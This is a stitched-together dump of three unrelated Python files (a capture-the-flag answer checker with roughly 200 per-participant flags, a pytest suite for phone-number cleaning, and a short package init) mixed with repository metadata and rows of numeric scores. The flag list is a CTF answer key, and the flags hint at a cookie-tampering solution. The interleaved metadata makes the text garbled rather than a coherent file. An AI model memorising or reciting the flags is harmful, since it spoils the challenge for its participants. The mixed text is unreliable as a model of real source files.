| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
03b80b5f262e99217c84a1f78d4deff1ac59d1e4
| 8,874
|
py
|
Python
|
tasks-deploy/code-lock/check.py
|
irdkwmnsb/lkshl-ctf
|
e5c0200ddc8ba73df5f321b87b9763fb1bbaba57
|
[
"MIT"
] | 3
|
2021-03-30T06:27:58.000Z
|
2021-04-03T17:56:35.000Z
|
tasks-deploy/code-lock/check.py
|
irdkwmnsb/lkshl-ctf
|
e5c0200ddc8ba73df5f321b87b9763fb1bbaba57
|
[
"MIT"
] | null | null | null |
tasks-deploy/code-lock/check.py
|
irdkwmnsb/lkshl-ctf
|
e5c0200ddc8ba73df5f321b87b9763fb1bbaba57
|
[
"MIT"
] | null | null | null |
def check(attempt, context):
if attempt.answer == flags[attempt.participant.id % len(flags)]:
return Checked(True)
if attempt.answer in flags:
return CheckedPlagiarist(False, flags.index(attempt.answer))
return Checked(False)
flags = ['LKL{MD5_0F_TRRU3_1N_C0OK1E5_E7FkLrE0Hd}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_nWv4lIWP4Z}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_GN8k5zwNBi}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_f3gu4NSaf3}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_suc1j6UtyC}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Km1EOUc1E5}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_EuVhBIF3LR}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_GTkQ3xAz9O}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_q6kkfGiX6N}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_75t4ylEKKJ}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_uqsjHid20w}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Ks7fPBannN}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_W53PnTKahg}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Qs1OcHbxDj}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Qy8WIzfqzV}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_9eVjSYlOGy}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_WvOhSwt2H8}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_gAteo8iho9}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Wb12MmWqnI}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_4uVBL9rBZc}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_MZzhm1AvtE}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_byhJhHRz6b}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_bxPKCCgML9}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_8Kj8Gh7iko}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_3XN4PuoTw1}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_2FZo4copO6}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_APphEyjnx7}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_xX1BWKC0jI}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_iKGIiXfwJ2}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_pxg2uUD9xc}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Nu6bWBjqVh}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_t9h9vIynx9}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_BsEHiUlXeo}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_wsK3hALpvV}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_HCBiep8Pcg}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_O9kQaF92uV}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_WZgOZLmRF6}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_8P98KNJBbL}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_wQdycTf0Hx}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_2KSSI7gfuW}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_lRqYklSjnC}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_rkcRNEc1IO}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_TMRMPQDssA}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_n3GSV9wdHD}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_X4UQiRnm9G}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_9RPAQ2XD3f}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_ewmQcSXzVG}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_pMOjuDj84m}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_owMOMqeNTE}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_dXFa3B8Xa1}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_rFShtsFdcH}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_CuTqeLQotL}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_GkQR1nYLuV}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_AtNOUvvrb9}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_RnIKXvbt6y}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_i4cbvUXuDu}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_jtqkIMG8n3}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_x5rAos2Pt3}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_KJIfXBojYM}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_SI0OY0vBxV}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_xt7yMvW4gA}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_CtCJs0EAD4}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_bY7MDMdxEG}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_F8x7dqWVAC}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_28TlPFGyXN}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_n4yHPIwjFu}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_AHphaJoUoh}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_ud47Z0aIN0}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_0OuaNnfxap}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_MWCZ9ER0fD}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_TAqIJT2xoI}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_2VXhEbvu6y}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_74vceAHswb}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_RdlZ8qNVSy}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Efg9YtmRwm}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_KAv64LvPlA}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_LgzBLwqusr}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_EATGb7wwV1}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_AJklaM2sj3}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_nR7ppizOmH}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_8rWInA3pLD}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_f5joASdKnq}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_5rfVEA1SKn}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_rO5xSuYdDz}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_kbZPTX9FtK}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_cNmNdJL6eF}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_bKxKWL7PBi}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_0eP2wVMhru}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_tAzfAAiDgm}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_bz8gCn56xA}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_UzLWzbF2Ni}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_D7MFRh0m55}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_xjxxdeIY29}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_5oE2VFOm1k}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_mMMSl2FiqG}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_S58EvFoudu}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_QBlJUPK70l}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_mgXC4cgRuR}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_VuiyLzS1T4}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_HJ5wrhnqgE}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_nCRrvxwJZX}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_V9lt0nh0rM}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_v8J3kfKSG6}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_88BSxBcisc}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_y5zeTOPAoY}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_EmrgxJb4Oe}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_4JfZlC5ECb}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_IxWZ7as1oc}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_bJ35FOR1Ti}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_jXyPhOGl8y}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_7FeQCTrK6H}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_UrBJqGgzXr}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_40nN0hEuH7}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_J7E4c70kZv}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_nax4ozJZal}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_yyYxSaG9Lg}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_65FnwK4S3G}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_ngMiABpWgY}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_QkB7pGdlib}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_hn6JAgkfp9}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_5ttPHhCUeu}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_nQI9DleZwa}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_zXQDrDcXjp}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_rmh6wKqr5W}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_z6T4iezE4L}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_3MTz5wAeW8}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_YLt95J5LYL}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_HRRm2qmYvT}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_0qXTtOotJw}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Knby2j1Vt7}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_zM6uhXt9mr}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_NTrCKSg295}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_zsPVbOdef6}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_wmvh5yjGsq}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_qI4jbiLSTN}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_6V23wDGw8k}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_ZHl673rVvt}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_xYxPezygYG}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_u90OwejT10}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_dwYt0qUQbu}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_YSSbrhI4cJ}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_tMJi82eO94}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_DOoClZiTMu}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_HHUnmXLihJ}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_oXMNDpx4m1}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_ITb216Ivo1}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_8PtVtoTTQ8}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_jY0HPoKARs}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_qrqOy0yJ0t}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_pfaFNIL0ya}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_SyUNwciL9P}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_ikxL5q2Kue}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Vl4aTh0Hq5}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_pkBUX6Gjs9}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_dpRnWdBSkz}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_hI9JbIYFe7}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_lKoCvXpns3}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Ot1BpLsf6z}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_aUqePplEct}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_K3aeIewOl2}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_16k4UxewCG}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_xuiak6uSXY}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_a4U8B7Rq3I}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_PVRnOMjPdR}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_pTSlORIEJJ}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_n65P8A6oD8}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_cNycxwzwSf}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_E1OKRengPT}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_hlTNfsSVRf}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_x6Yo2kgfrG}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_u9OR9kw1A3}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_pm5n0uLlvn}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_KVLNi6K6Lh}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_niS3X6vskg}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_45wuBsCppI}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_0mkn86uBak}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_rf86w61Rrb}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_CURmEpdXzR}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_3iy7dIcHNc}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_CN3QgPm0AC}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_STousE6WAs}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_fVQDO6Y4Ox}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_X1ShYuFYc2}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_7hZlxuStvo}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_EsLJwfjjgU}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_jUgXCEFx5M}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Iilmp1gpbq}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_Lbib1dMN30}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_4LZMupzGvl}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_MvTFcaZ9nG}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_QTtK6790A8}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_0cH7DzUtRc}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_9BfKPhJt2W}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_fRsz5DvE7z}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_nVHFv3keM0}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_3ovtZ3Eq7m}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_JYBLE3b2to}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_28YfHsvyXL}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_pG0ysfTe3g}', 'LKL{MD5_0F_TRRU3_1N_C0OK1E5_XbD1thtjEN}']
| 1,109.25
| 8,608
| 0.854519
| 1,432
| 8,874
| 4.597067
| 0.155726
| 0.182288
| 0.24305
| 0.394957
| 0.668388
| 0.668388
| 0
| 0
| 0
| 0
| 0
| 0.202252
| 0.029412
| 8,874
| 8
| 8,608
| 1,109.25
| 0.562057
| 0
| 0
| 0
| 0
| 0
| 0.879567
| 0.879567
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0
| 0
| 0.571429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
03e1d5503ba51d581812a10f350a8a86e69fcd07
| 12,968
|
py
|
Python
|
dataprep/tests/clean/test_clean_phone.py
|
Waterpine/dataprep-1
|
4032acb1d1f2c413d4cb000d17e8ffa611315f9f
|
[
"MIT"
] | 1,229
|
2019-12-21T02:58:59.000Z
|
2022-03-30T08:12:33.000Z
|
dataprep/tests/clean/test_clean_phone.py
|
Waterpine/dataprep-1
|
4032acb1d1f2c413d4cb000d17e8ffa611315f9f
|
[
"MIT"
] | 680
|
2019-12-19T06:09:23.000Z
|
2022-03-31T04:15:25.000Z
|
dataprep/tests/clean/test_clean_phone.py
|
Waterpine/dataprep-1
|
4032acb1d1f2c413d4cb000d17e8ffa611315f9f
|
[
"MIT"
] | 170
|
2020-01-08T03:27:26.000Z
|
2022-03-20T20:42:55.000Z
|
"""
module for testing the functions clean_phone() and validate_phone()
"""
import logging
import numpy as np
import pandas as pd
import pytest
from ...clean import clean_phone, validate_phone
LOGGER = logging.getLogger(__name__)
@pytest.fixture(scope="module") # type: ignore
def df_phone() -> pd.DataFrame:
df = pd.DataFrame(
{
"messy_phone": [
"555-234-5678",
"(555) 234-5678",
"555.234.5678",
"555/234/5678",
15551234567,
"(1) 555-234-5678",
"+1 (234) 567-8901 x. 1234",
"2345678901 extension 1234",
"2345678",
"800-299-JUNK",
"1-866-4ZIPCAR",
"1-800-G-O-T-J-U-N-K",
"123 ABC COMPANY",
"+66 91 889 8948",
"hello",
np.nan,
"NULL",
]
}
)
return df
def test_clean_default(df_phone: pd.DataFrame) -> None:
df_clean = clean_phone(df_phone, "messy_phone")
df_check = df_phone.copy()
df_check["messy_phone_clean"] = [
"555-234-5678",
"555-234-5678",
"555-234-5678",
"555-234-5678",
"555-123-4567",
"555-234-5678",
"234-567-8901 ext. 1234",
"234-567-8901 ext. 1234",
"234-5678",
"800-299-5865",
"866-494-7227",
"800-468-5865",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
]
assert df_check.equals(df_clean)
def test_clean_output_format(df_phone: pd.DataFrame) -> None:
df_clean_e164 = clean_phone(df_phone, "messy_phone", output_format="e164")
df_clean_natl = clean_phone(df_phone, "messy_phone", output_format="national")
df_check_e164 = df_phone.copy()
df_check_e164["messy_phone_clean"] = [
"+15552345678",
"+15552345678",
"+15552345678",
"+15552345678",
"+15551234567",
"+15552345678",
"+12345678901 ext. 1234",
"+12345678901 ext. 1234",
"2345678",
"+18002995865",
"+18664947227",
"+18004685865",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
]
df_check_natl = df_phone.copy()
df_check_natl["messy_phone_clean"] = [
"(555) 234-5678",
"(555) 234-5678",
"(555) 234-5678",
"(555) 234-5678",
"(555) 123-4567",
"(555) 234-5678",
"(234) 567-8901 ext. 1234",
"(234) 567-8901 ext. 1234",
"234-5678",
"(800) 299-5865",
"(866) 494-7227",
"(800) 468-5865",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
]
assert df_check_e164.equals(df_clean_e164)
assert df_check_natl.equals(df_clean_natl)
def test_clean_split(df_phone: pd.DataFrame) -> None:
df_clean = clean_phone(df_phone, "messy_phone", split=True)
df_check = df_phone.copy()
df_check["country_code"] = [
np.nan,
np.nan,
np.nan,
np.nan,
"1",
"1",
"1",
np.nan,
np.nan,
np.nan,
"1",
"1",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
]
df_check["area_code"] = [
"555",
"555",
"555",
"555",
"555",
"555",
"234",
"234",
np.nan,
"800",
"866",
"800",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
]
df_check["office_code"] = [
"234",
"234",
"234",
"234",
"123",
"234",
"567",
"567",
"234",
"299",
"494",
"468",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
]
df_check["station_code"] = [
"5678",
"5678",
"5678",
"5678",
"4567",
"5678",
"8901",
"8901",
"5678",
"5865",
"7227",
"5865",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
]
df_check["ext_num"] = [
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
"1234",
"1234",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
]
assert df_check.equals(df_clean)
def test_clean_split_fix_missing(df_phone: pd.DataFrame) -> None:
df_clean = clean_phone(df_phone, "messy_phone", split=True, fix_missing="auto")
df_check = df_phone.copy()
df_check["country_code"] = [
"1",
"1",
"1",
"1",
"1",
"1",
"1",
"1",
np.nan,
"1",
"1",
"1",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
]
df_check["area_code"] = [
"555",
"555",
"555",
"555",
"555",
"555",
"234",
"234",
np.nan,
"800",
"866",
"800",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
]
df_check["office_code"] = [
"234",
"234",
"234",
"234",
"123",
"234",
"567",
"567",
"234",
"299",
"494",
"468",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
]
df_check["station_code"] = [
"5678",
"5678",
"5678",
"5678",
"4567",
"5678",
"8901",
"8901",
"5678",
"5865",
"7227",
"5865",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
]
df_check["ext_num"] = [
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
"1234",
"1234",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
]
assert df_check.equals(df_clean)
def test_clean_inplace(df_phone: pd.DataFrame) -> None:
df_clean = clean_phone(df_phone, "messy_phone", inplace=True)
df_check = pd.DataFrame(
{
"messy_phone_clean": [
"555-234-5678",
"555-234-5678",
"555-234-5678",
"555-234-5678",
"555-123-4567",
"555-234-5678",
"234-567-8901 ext. 1234",
"234-567-8901 ext. 1234",
"234-5678",
"800-299-5865",
"866-494-7227",
"800-468-5865",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
]
}
)
assert df_check.equals(df_clean)
def test_clean_split_inplace(df_phone: pd.DataFrame) -> None:
df_clean = clean_phone(df_phone, "messy_phone", split=True, inplace=True)
df_check = pd.DataFrame(
{
"country_code": [
np.nan,
np.nan,
np.nan,
np.nan,
"1",
"1",
"1",
np.nan,
np.nan,
np.nan,
"1",
"1",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
],
"area_code": [
"555",
"555",
"555",
"555",
"555",
"555",
"234",
"234",
np.nan,
"800",
"866",
"800",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
],
"office_code": [
"234",
"234",
"234",
"234",
"123",
"234",
"567",
"567",
"234",
"299",
"494",
"468",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
],
"station_code": [
"5678",
"5678",
"5678",
"5678",
"4567",
"5678",
"8901",
"8901",
"5678",
"5865",
"7227",
"5865",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
],
"ext_num": [
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
"1234",
"1234",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
],
}
)
assert df_check.equals(df_clean)
def test_clean_split_inplace_fix_missing(df_phone: pd.DataFrame) -> None:
df_clean = clean_phone(df_phone, "messy_phone", split=True, inplace=True, fix_missing="auto")
df_check = pd.DataFrame(
{
"country_code": [
"1",
"1",
"1",
"1",
"1",
"1",
"1",
"1",
np.nan,
"1",
"1",
"1",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
],
"area_code": [
"555",
"555",
"555",
"555",
"555",
"555",
"234",
"234",
np.nan,
"800",
"866",
"800",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
],
"office_code": [
"234",
"234",
"234",
"234",
"123",
"234",
"567",
"567",
"234",
"299",
"494",
"468",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
],
"station_code": [
"5678",
"5678",
"5678",
"5678",
"4567",
"5678",
"8901",
"8901",
"5678",
"5865",
"7227",
"5865",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
],
"ext_num": [
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
"1234",
"1234",
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
],
}
)
assert df_check.equals(df_clean)
def test_validate_value() -> None:
assert validate_phone(1234) == False
assert validate_phone(2346789) == True
assert validate_phone("1 800 234 6789") == True
assert validate_phone("+44 7700 900077") == False
assert validate_phone("555-234-6789 ext 32") == True
assert validate_phone("1-866-4ZIPCAR") == True
assert validate_phone("1-800-G-O-T-J-U-N-K") == True
assert validate_phone("123 ABC COMPANY") == False
def test_validate_series(df_phone: pd.DataFrame) -> None:
srs_valid = validate_phone(df_phone["messy_phone"])
srs_check = pd.Series(
[
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
True,
False,
False,
False,
False,
False,
],
name="messy_phone",
)
assert srs_check.equals(srs_valid)
| 22.016978
| 97
| 0.349861
| 1,223
| 12,968
| 3.566639
| 0.089943
| 0.207474
| 0.227877
| 0.325539
| 0.766162
| 0.74232
| 0.709537
| 0.697157
| 0.679276
| 0.662769
| 0
| 0.199201
| 0.517659
| 12,968
| 588
| 98
| 22.054422
| 0.498161
| 0.006246
| 0
| 0.825623
| 0
| 0
| 0.148536
| 0
| 0
| 0
| 0
| 0
| 0.030249
| 1
| 0.017794
| false
| 0
| 0.008897
| 0
| 0.02847
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
03fa27dc79bdc3060a8dcdd44f8bb1a47abc2615
| 168
|
py
|
Python
|
DTMT/dtmt/interface/__init__.py
|
fandongmeng/StackedDTMT
|
f10062f98a443ad67cadec68fa5abdc8ab60815f
|
[
"BSD-3-Clause"
] | 3
|
2020-09-22T07:33:29.000Z
|
2021-02-19T09:53:28.000Z
|
DTMT/dtmt/interface/__init__.py
|
fandongmeng/StackedDTMT
|
f10062f98a443ad67cadec68fa5abdc8ab60815f
|
[
"BSD-3-Clause"
] | null | null | null |
DTMT/dtmt/interface/__init__.py
|
fandongmeng/StackedDTMT
|
f10062f98a443ad67cadec68fa5abdc8ab60815f
|
[
"BSD-3-Clause"
] | null | null | null |
# coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from dtmt.interface.model import NMTModel
| 21
| 41
| 0.85119
| 23
| 168
| 5.608696
| 0.608696
| 0.232558
| 0.372093
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006757
| 0.119048
| 168
| 7
| 42
| 24
| 0.864865
| 0.071429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.25
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
